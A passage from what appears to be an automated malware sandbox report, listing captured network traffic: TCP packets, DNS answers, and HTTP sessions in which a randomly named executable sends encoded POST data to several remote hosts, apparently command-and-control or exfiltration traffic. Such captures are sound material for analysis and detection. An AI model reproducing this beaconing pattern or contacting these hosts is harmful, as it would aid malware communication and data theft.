                                                                                                                                                            Dec 8, 2023 14:53:06.361323118 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361358881 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361452103 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.600351095 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600379944 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600394011 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600456953 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600505114 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600646973 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600667000 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.600701094 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.600764990 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.600773096 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600810051 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600863934 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600886106 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.600931883 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600994110 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.601022959 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601123095 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601172924 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601197004 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.601294994 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601362944 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.601371050 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601461887 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601526022 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601531029 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.601648092 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601702929 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601731062 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.601754904 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601823092 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.622687101 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.839814901 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.839874983 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.839915991 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.839952946 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.839950085 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.839991093 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840027094 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840028048 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840027094 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840068102 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840075016 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840087891 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840121984 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840126038 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840158939 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840166092 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840197086 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840202093 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840234041 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840240002 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840272903 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840276957 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840311050 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840317011 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840348005 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840354919 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840385914 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840399027 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840424061 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840425014 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840465069 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840466976 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840511084 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840528011 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840572119 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840586901 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840622902 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840660095 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840662956 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840662956 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840697050 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840747118 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840747118 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840841055 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840878010 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840884924 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840920925 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840924025 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840956926 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840962887 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840996981 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841013908 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841033936 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841039896 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841072083 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841072083 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841114044 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841124058 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841154099 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841248989 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841285944 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841291904 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841332912 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841445923 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841485023 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.841489077 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.841522932 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:18.315771103 CET4978580192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:18.441553116 CET8049785107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:18.642144918 CET8049785107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:18.642203093 CET8049785107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:18.642337084 CET4978580192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:19.826370001 CET4978580192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:20.841763973 CET4978680192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:20.966993093 CET8049786107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:20.967094898 CET4978680192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:20.967322111 CET4978680192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:21.093918085 CET8049786107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:21.291337967 CET8049786107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:21.294703007 CET8049786107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:21.294732094 CET8049786107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:21.294888020 CET4978680192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:22.481982946 CET4978680192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:23.498985052 CET4978780192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:23.624866009 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.625058889 CET4978780192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:23.626859903 CET4978780192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:23.752962112 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.752986908 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.752998114 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753009081 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753066063 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753087997 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753192902 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753204107 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.753226995 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.953020096 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.953039885 CET8049787107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:23.953108072 CET4978780192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:25.138149977 CET4978780192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.154042006 CET4978880192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.279249907 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.279342890 CET4978880192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.280189991 CET4978880192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.405200005 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606383085 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606403112 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606487036 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606501102 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606513977 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606528044 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:26.606741905 CET4978880192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.606955051 CET4978880192.168.2.4107.178.250.177
                                                                                                                                                            Dec 8, 2023 14:53:26.732121944 CET8049788107.178.250.177192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:32.081887007 CET4978980192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:32.316426039 CET804978937.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:32.316590071 CET4978980192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:32.316797972 CET4978980192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:32.552953959 CET804978937.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:32.553061008 CET4978980192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:33.825727940 CET4978980192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:34.841806889 CET4979080192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:35.076452971 CET804979037.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:35.076554060 CET4979080192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:35.076858044 CET4979080192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:35.313324928 CET804979037.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:35.313414097 CET4979080192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:36.594357014 CET4979080192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:37.607178926 CET4979180192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:37.846836090 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:37.847064018 CET4979180192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:37.848824024 CET4979180192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:38.088474989 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088500977 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088511944 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088526011 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088537931 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088548899 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088624954 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088664055 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088669062 CET4979180192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:38.088741064 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:38.328205109 CET804979137.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.372870922 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.611691952 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.611780882 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.611998081 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.852206945 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852233887 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852252960 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852272034 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852313042 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852364063 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852443933 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852505922 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.852505922 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.852509022 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852539062 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852555990 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:40.852638960 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852688074 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091236115 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091258049 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091272116 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091291904 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091311932 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091324091 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091331959 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091351032 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091370106 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091388941 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091391087 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091408014 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091420889 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091428995 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091448069 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091464996 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091473103 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091484070 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091502905 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091520071 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091522932 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091540098 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091542006 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091561079 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091576099 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091612101 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.091634035 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091650009 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.091700077 CET4979280192.168.2.437.97.254.27
                                                                                                                                                            Dec 8, 2023 14:53:41.330385923 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.330416918 CET804979237.97.254.27192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:41.330440998 CET804979237.97.254.27192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                            Dec 8, 2023 14:53:18.187824011 CET1.1.1.1192.168.2.40x6bd5No error (0)www.77moea.top34.120.55.112A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:32.080784082 CET1.1.1.1192.168.2.40xc75dNo error (0)www.wrautomotive.onlinewrautomotive.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:32.080784082 CET1.1.1.1192.168.2.40xc75dNo error (0)wrautomotive.online37.97.254.27A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:47.089373112 CET1.1.1.1192.168.2.40x7db7No error (0)www.npstore.asiadns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:47.089373112 CET1.1.1.1192.168.2.40x7db7No error (0)dns.ladipage.com52.220.48.161A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:47.089373112 CET1.1.1.1192.168.2.40x7db7No error (0)dns.ladipage.com13.213.230.75A (IP address)IN (0x0001)false
                                                                                                                                                            Dec 8, 2023 14:53:47.089373112 CET1.1.1.1192.168.2.40x7db7No error (0)dns.ladipage.com52.77.138.116A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 162.222.226.77 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:50:19.134288073 CET | 480 | OUT | GET /ahec/?XveXHZvx=0lWeLq0ljZnDSWqNACJ6NPdmpHmas/FJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyVl134IW6OhHwJLQ==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.alldaysslimmingstea.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:50:19.337153912 CET | 844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:19 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Last-Modified: Tue, 15 Mar 2022 21:16:32 GMT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Content-Length: 583
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 74.208.236.181 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:50:34.831656933 CET | 759 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.user4deepriver.com
                                                                                                                                                            Origin: http://www.user4deepriver.com
                                                                                                                                                            Referer: http://www.user4deepriver.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIytni9uCUDpH0nHCxDCw==
Dec 8, 2023 14:50:35.005354881 CET | 580 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:34 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49741 | 74.208.236.181 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:50:37.526036978 CET | 779 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.user4deepriver.com
                                                                                                                                                            Origin: http://www.user4deepriver.com
                                                                                                                                                            Referer: http://www.user4deepriver.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=wmeP+ID8aGX5wHl5Zgof5RIwCOEi9PhQDTtOdtLJCnl0imXMI6VSZPatiqThbznz5qzUgoDiidV7PpDtWlZBSTQ1rR5HXmoKamgnRfXmT4FS3hHd8vBjPw5RjwusHiCp1doyccljsS+CnhIxaDj7hEoZ048actJJtEbjiwUTuRZNCXdQFKTKXdnymMCkMyj+1vYYSbw=
Dec 8, 2023 14:50:37.699758053 CET | 580 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
